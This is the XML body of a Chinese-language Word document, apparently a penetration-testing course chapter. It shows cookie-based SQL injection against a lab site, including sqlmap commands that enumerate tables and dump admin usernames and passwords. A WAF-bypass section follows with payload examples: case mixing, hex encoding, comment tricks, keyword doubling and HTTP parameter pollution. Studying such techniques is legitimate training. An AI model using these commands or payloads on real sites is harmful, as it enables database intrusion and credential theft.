    <w:p w14:paraId="0B60546C" w14:textId="77777777" w:rsidR="002B146D" w:rsidRDefault="002B146D" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B4F7091" wp14:editId="119E4EB5">
            <wp:extent cx="5278120" cy="3154926"/>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5278120" cy="3154926"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="099374CD" w14:textId="77777777" w:rsidR="002B146D" w:rsidRDefault="002B146D" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013E3C0A" wp14:editId="4B920DA5">
            <wp:extent cx="5278120" cy="3707636"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5278120" cy="3707636"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F48D79" w14:textId="77777777" w:rsidR="006130E7" w:rsidRDefault="006130E7" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E45337" w14:textId="77777777" w:rsidR="002C6909" w:rsidRDefault="002C6909" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006130E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞原因分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A595359" w14:textId="77777777" w:rsidR="006130E7" w:rsidRDefault="006130E7" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D224DC2" wp14:editId="680DD01C">
            <wp:extent cx="5278120" cy="3775138"/>
            <wp:effectExtent l="1905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5278120" cy="3775138"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF6C86" w14:textId="77777777" w:rsidR="006130E7" w:rsidRDefault="006130E7" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F5AAB2" wp14:editId="0FA2576B">
            <wp:extent cx="5278120" cy="4729974"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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5278120" cy="4729974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19533FCD" w14:textId="77777777" w:rsidR="005F6945" w:rsidRDefault="00231261" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第二种方法：通过注入中转器工具进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，注入地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00231261">
        <w:t xml:space="preserve"> http://172.16.24.188/productshow.asp?id=58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具填写请参照下图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C35D43" w14:textId="77777777" w:rsidR="00231261" w:rsidRDefault="00231261" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="620054F3" wp14:editId="41C7C724">
            <wp:extent cx="5278120" cy="2748946"/>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5278120" cy="2748946"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD993F" w14:textId="77777777" w:rsidR="00231261" w:rsidRDefault="00231261" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后访问生成出来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">jmcook.asp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，记得文件后面接上工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交值这栏的参数，最终打开的地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00231261">
        <w:t>http://localhost:4086/jmCook.asp?jmdcw=58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CF1C9" w14:textId="77777777" w:rsidR="00003506" w:rsidRDefault="00003506" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="282F9A41" wp14:editId="453D71DA">
            <wp:extent cx="5278120" cy="2526931"/>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278120" cy="2526931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E47514" w14:textId="77777777" w:rsidR="00003506" w:rsidRDefault="00003506" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三种方法：</w:t>
      </w:r>
      <w:r w:rsidR="00326D8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00326D8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="00326D8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现</w:t>
      </w:r>
      <w:r w:rsidR="00326D8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00326D8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C3790" w14:textId="77777777" w:rsidR="00326D8A" w:rsidRDefault="00326D8A" w:rsidP="00326D8A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D:\VStart50\tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\sqlmap&gt;sqlmap.py -u "http://172.16.24.188/productshow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C6B19" w14:textId="77777777" w:rsidR="00326D8A" w:rsidRDefault="00326D8A" w:rsidP="00326D8A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.asp" --cookie "id=58" --level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC58B7A" w14:textId="77777777" w:rsidR="00326D8A" w:rsidRDefault="00326D8A" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6145818C" wp14:editId="4287D165">
            <wp:extent cx="5278120" cy="2392230"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5278120" cy="2392230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7184A8A6" w14:textId="77777777" w:rsidR="0030294E" w:rsidRDefault="0030294E" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D:\VStart50\tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\sqlmap&gt;sqlmap.py -u "http://172.16.24.188/productshow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946E6B6" w14:textId="77777777" w:rsidR="0030294E" w:rsidRDefault="0030294E" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.asp" --cookie "id=58" --level 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D9815" w14:textId="77777777" w:rsidR="0030294E" w:rsidRDefault="0030294E" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D:\VStart50\tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\sqlmap&gt;sqlmap.py -u "http://172.16.24.188/productshow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24900771" w14:textId="77777777" w:rsidR="0030294E" w:rsidRDefault="0030294E" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.asp" --cookie "id=58" --level 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --columns -T admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A3B2A" w14:textId="77777777" w:rsidR="0030294E" w:rsidRDefault="0030294E" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D:\VStart50\tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\sqlmap&gt;sqlmap.py -u "http://172.16.24.188/productshow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203C9BD1" w14:textId="77777777" w:rsidR="0030294E" w:rsidRDefault="0030294E" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.asp" --cookie "id=58" --level 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump -C "username,password" -T admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032676F" w14:textId="77777777" w:rsidR="005322A9" w:rsidRDefault="005322A9" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B6E43E" w14:textId="77777777" w:rsidR="005322A9" w:rsidRDefault="005322A9" w:rsidP="0030294E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5EECF9" w14:textId="77777777" w:rsidR="005322A9" w:rsidRDefault="0030294E" w:rsidP="005322A9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果想</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005322A9" w:rsidRPr="005322A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005322A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap.py -u "http://172.16.24.188/productshow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5ED1D" w14:textId="77777777" w:rsidR="0030294E" w:rsidRDefault="005322A9" w:rsidP="005322A9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.asp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --data "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55565783" w14:textId="77777777" w:rsidR="00326D8A" w:rsidRDefault="00326D8A" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C681E98" w14:textId="77777777" w:rsidR="00231261" w:rsidRDefault="00231261" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716A9D89" w14:textId="77777777" w:rsidR="007A26EA" w:rsidRPr="007A26EA" w:rsidRDefault="007A26EA" w:rsidP="007A26EA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222A7566" w14:textId="77777777" w:rsidR="002D4575" w:rsidRPr="002D4575" w:rsidRDefault="002D4575" w:rsidP="002D4575">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E6A1CC" w14:textId="77777777" w:rsidR="002D4575" w:rsidRPr="002D4575" w:rsidRDefault="002D4575" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D9DD7D" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRDefault="006472F7" w:rsidP="006472F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="002D4575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00951D74">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00951D74">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E61BB" w:rsidRPr="009E61BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidR="009E61BB" w:rsidRPr="009E61BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12B7BD"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t>1. 大小写绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F9166"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lastRenderedPageBreak/>
        <w:t>这个大家都很熟悉，对于一些太垃圾的WAF效果显著，比如拦截了union,那就使用Union UnIoN</w:t>
      </w:r>
      <w:r w:rsidR="00200887">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等等</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidR="00200887">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719B152" w14:textId="77777777" w:rsidR="004B5B16" w:rsidRPr="00CD76A0" w:rsidRDefault="004B5B16" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB48AA1"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t>2. 简单编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C37156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WAF检测关键字，那么我们让他检测不到就可以了。比如检测union,那么我们就用%55 也就是U的16进制编码来代替U, union写成 %55nION，结合大小写也可以绕过一些WAF，你可以随意替换一个或几个都可以。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E2016"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也还有大家在Mysql注入中比如表名或是load文件的时候，会把文件名或是表明用16进制编码来绕过WAF都是属于这类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7261C0E2"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t>3. 注释绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B319696"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这种情况比较少，适用于WAF只是过滤了一次危险的语句，而没有阻断我们的整个查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286AD555" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="004B5B16"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select+1,2,3/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586D361"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对于上面这条查询，WAF过滤了一次union和select，那么我们在之前在写一个注释的语句，让他把注释里面的过滤掉，，并不影响我们的查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4067FE3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所以绕过语句就是：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/?id=1/un</w:t>
      </w:r>
      <w:r w:rsidR="00CE1633" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ion/union/select/select+1,2,3/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091475E"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还有一种和注释有关的绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BDFDB"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index.php?page_id=-15 /!UNION/ /!SELECT/ 1,2,3,4….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15778E08" w14:textId="77777777" w:rsidR="00AD5E5D"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可以看到，只要我们把敏感词放到注释里面，注意，前面要加一个！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26908899"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t>4. 分隔重写绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D51832"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还是上面的例子，适用于那种WAF采用了正则表达式的情况，会检测所有的敏感字，而不在乎你写在哪里，有几个就过滤几个。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DFC00" w14:textId="77777777" w:rsidR="009E61BB"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我们可以通过注释分开敏感字,这样WAF的正则不起作用了，而带入查询的时候并不影响我们的结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/?id=1+un//ion+sel//</w:t>
      </w:r>
      <w:r w:rsidR="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ect+1,2,3—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E894A91"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至于重写绕过，适用于WAF过滤了一次的情况，和我们上传aaspsp马的原理一样，我们可以写出类似Ununionion这样的。过滤一次union后就会执行我们的查询了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE69DA" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="006472F7" w:rsidP="006472F7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?id=1 ununionion select 1,2,3—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FAD7B"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lastRenderedPageBreak/>
        <w:t>5. Http参数污染(HPP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F26F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我们有这样的语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827B9E9"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 union sele</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ct+1,2,3+from+users+where+id=1—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3713FF1B"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我们可以重复一次前面的id值添加我们的值来绕过，&amp;id=会在查询时变成逗号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E7206"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 union select+1&amp;id=2,3+from+users+where+i</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d=1—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D90109"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这种情况成功的条件比较多，取决于具体的WAF实现。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D097A3A"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再给出一个例子说明用法</w:t>
      </w:r>
    </w:p>
